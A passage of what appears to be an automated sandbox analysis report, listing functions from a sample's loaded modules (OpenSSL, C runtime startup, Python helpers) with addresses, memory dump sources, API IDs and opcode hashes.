                                                                                                                                                                                                                            • Instruction ID: 2c5cedf2b7cff283e2fb151ebadbb3bd79bbde59815cc522d2a655420a7790e2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 503bce6c2c57985b77625ead039adc51ab1d0390028000737676f149e22b8228
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63118E21B0864246F754AB25F421BE95760AF85784F884231EF7CC7BDFEE2DE5818700
                                                                                                                                                                                                                            Function 00007FFDFF267D20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_f_bufferO_int_ctrlO_newO_push
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_init_wbio_buffer
                                                                                                                                                                                                                            • API String ID: 1655923927-1860519770
                                                                                                                                                                                                                            • Opcode ID: 79179179530663e2d18ccf8ca684f7f2b1e4b0b6c877242affe0f20e0e512c9c
                                                                                                                                                                                                                            • Instruction ID: 0f0ed9e83497039eedc37928ec7ae105461964c2a791d0ce17010bde76b09846
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79179179530663e2d18ccf8ca684f7f2b1e4b0b6c877242affe0f20e0e512c9c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1115111F1964242EB58A761F561BE95350AF84784F881334EE3DCBBCBEE3DE4914B00
                                                                                                                                                                                                                            Function 00007FFE0CFD1030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878106458.00007FFE0CFD0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878147059.00007FFE0CFD3000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878163707.00007FFE0CFD4000.00000004.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878181390.00007FFE0CFD5000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: b53d2610c2308face5b4d83ffd6ae037b30c8879badde57d46025b1d0420a925
                                                                                                                                                                                                                            • Instruction ID: 78adad2e93da1d7320e9aac4563aa2e1ca6c3bf092d709015f7df6c327f27b68
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b53d2610c2308face5b4d83ffd6ae037b30c8879badde57d46025b1d0420a925
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6581AE61E8C24346F650AB6DA4412BD62E3AF457A8F54C135EACD477B6DF3CE4058703
                                                                                                                                                                                                                            Function 00007FFE0E141030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878605073.00007FFE0E141000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFE0E140000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878486915.00007FFE0E140000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878635209.00007FFE0E144000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878654068.00007FFE0E145000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878672109.00007FFE0E146000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e140000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: d8b20e02c901b865873e7091ce4e44ae4228cf79fcdaf74b4f9438ea969cd35b
                                                                                                                                                                                                                            • Instruction ID: 4a2e28786eb86e285010bdf113d70418af9663d231d336e4be8d5fa69c76e771
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8b20e02c901b865873e7091ce4e44ae4228cf79fcdaf74b4f9438ea969cd35b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B781CCE1F0E34766FA50AB66A4412B92691FF95B80F544037DADD877B6DE3CE8828700
                                                                                                                                                                                                                            Function 00007FFE0E131030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878335285.00007FFE0E131000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFE0E130000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878291246.00007FFE0E130000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878375563.00007FFE0E136000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878423261.00007FFE0E13B000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e130000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 3667c9311effcda5bebfcd6f0c463b07b4ccdab133b9d1969c09bf43b1d98b8c
                                                                                                                                                                                                                            • Instruction ID: 643e6fce151e437431834b7eb3245ea8491cb614ba86aacd05da2f1e5b4eee91
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3667c9311effcda5bebfcd6f0c463b07b4ccdab133b9d1969c09bf43b1d98b8c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49817C61F0E243A6FA60AB7694412B972A1BF85780F548537DACD877B7DF3CE8468700
                                                                                                                                                                                                                            Function 00007FFE0CFE1030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878198987.00007FFE0CFE0000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878236359.00007FFE0CFE3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878254447.00007FFE0CFE4000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878272126.00007FFE0CFE5000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 31d8e522e61a33cf479bf52350be3450eaa8bff41c9a3cd264d2142d6b397c0f
                                                                                                                                                                                                                            • Instruction ID: 6af1eb97bf459abc998547385e3db9cb65df4ed2c805d127c8cf203235b00ab6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d8e522e61a33cf479bf52350be3450eaa8bff41c9a3cd264d2142d6b397c0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B819061E8C24386FA50AB6FA8412BD66E1AF95780F55C139DA0D837BFDE3CE4458703
                                                                                                                                                                                                                            Function 00007FFE0CFB12CC Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878001785.00007FFE0CFB1000.00000020.00000001.01000000.0000002C.sdmp, Offset: 00007FFE0CFB0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877953890.00007FFE0CFB0000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878046330.00007FFE0CFB5000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878066834.00007FFE0CFBF000.00000004.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878086023.00007FFE0CFC0000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfb0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 25c34cf625cfd52ada091fdb65a0fc74a29e9636dd4e47856e36c618d7ae6fa2
                                                                                                                                                                                                                            • Instruction ID: b36dc2e60cc373a4d17fb565cb5bb34bfb2420a10d20f5eb9e5997e0083daa27
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25c34cf625cfd52ada091fdb65a0fc74a29e9636dd4e47856e36c618d7ae6fa2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E81D125E8C64786FB50AB6E95612BD62D0AF45780F64D035DB0E877B6EF3CE8418703
                                                                                                                                                                                                                            Function 00007FFE0E151030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878707402.00007FFE0E151000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFE0E150000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878689714.00007FFE0E150000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878725552.00007FFE0E153000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878743319.00007FFE0E155000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e150000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction ID: 0c8ee5fed206b50fcb84c536904bce7075ff4d8a92888d37dac19a2ac6df65c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B81B063F0EA43E6FB52AB6694813B92290AF85780F544537D9DD877B6DF3CE8418700
                                                                                                                                                                                                                            Function 00007FFE0E161030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878783464.00007FFE0E161000.00000020.00000001.01000000.00000026.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878762255.00007FFE0E160000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878804469.00007FFE0E163000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878824157.00007FFE0E165000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e160000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction ID: bf547799d02e455383cdb2509bf1dbe618df9eb90857327706515503e7f40fda
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B81F661F0E243A6FB50AB66A4412B962E0BF96B80F548437D9DD877B7DF3CE8458700
                                                                                                                                                                                                                            Function 00007FFDFF253ED0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_num$L_sk_pop_freeL_sk_valueR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$ssl_cert_set0_chain
                                                                                                                                                                                                                            • API String ID: 4258318168-2020944375
                                                                                                                                                                                                                            • Opcode ID: 785295854da14665c78a253414d91da37a8c857f00ad98f6eed574386411f58f
                                                                                                                                                                                                                            • Instruction ID: 2fb746ea642566d96fed5d8fc4a31c68f6a7860b03925202b90227ddd18f74c0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 785295854da14665c78a253414d91da37a8c857f00ad98f6eed574386411f58f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6621B621B0C69146E7049B12A4619BAA3A1FF84BD4F440631EE7DC3BEEEF7CE4428700
                                                                                                                                                                                                                            Function 00007FFDFABD46A8 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$digit$not a digit
                                                                                                                                                                                                                            • API String ID: 4245020737-4278345224
                                                                                                                                                                                                                            • Opcode ID: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                            • Instruction ID: c706d9acec37c746bb1740f4a2bd7f8afcdbdec7bfc39a1a9721bae238ef2e4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03217C35B0CA4281EB188B16D864A7923A8FB45B84FD840B6DD6E87BEDDF3DE4458300
                                                                                                                                                                                                                            Function 00007FFDFF241D6B Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_enable_ct$SSL_set_ct_validation_callback
                                                                                                                                                                                                                            • API String ID: 1552677711-3628548113
                                                                                                                                                                                                                            • Opcode ID: 277a3b24fac54687f3e9279b456c8ba5a5bee142f3b5f7221e8a3c4580188344
                                                                                                                                                                                                                            • Instruction ID: b901655a7dcdaa0ba0ae4b2fdce6802d92e4b0d4a57355448330259142acfe4f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 277a3b24fac54687f3e9279b456c8ba5a5bee142f3b5f7221e8a3c4580188344
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8218E61F0964282F76497A1D871BF91390EF84700FD85231DA3CCABDAEE2DE9819710
                                                                                                                                                                                                                            Function 00007FFDFABD2720 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                                                            • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                            • Instruction ID: 0b60cf193a90e8f8240c94a87cc443a821b6ebc113ffb3dd6e6284349e80c5d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6281DF30F0C2C386FB6CAB6594B1AB96690AF85780FD481B9D92C573DEDE3DE8458700
                                                                                                                                                                                                                            Function 00007FF6029A52F0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                            • Opcode ID: ad0da91b2cbdcb8f08c3846c4c02ca50bf33c483497c0b12da9b617f6c71299c
                                                                                                                                                                                                                            • Instruction ID: 7eb758c8dba578743f46326a1c04c039330baff8b7b74f8535aac1116ce7b538
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad0da91b2cbdcb8f08c3846c4c02ca50bf33c483497c0b12da9b617f6c71299c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3912B761F0C34386FB605B1AD0446797AA1FF80758FE64035E68AC76C6DFBCE9808B90
                                                                                                                                                                                                                            Function 00007FF6029A0038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
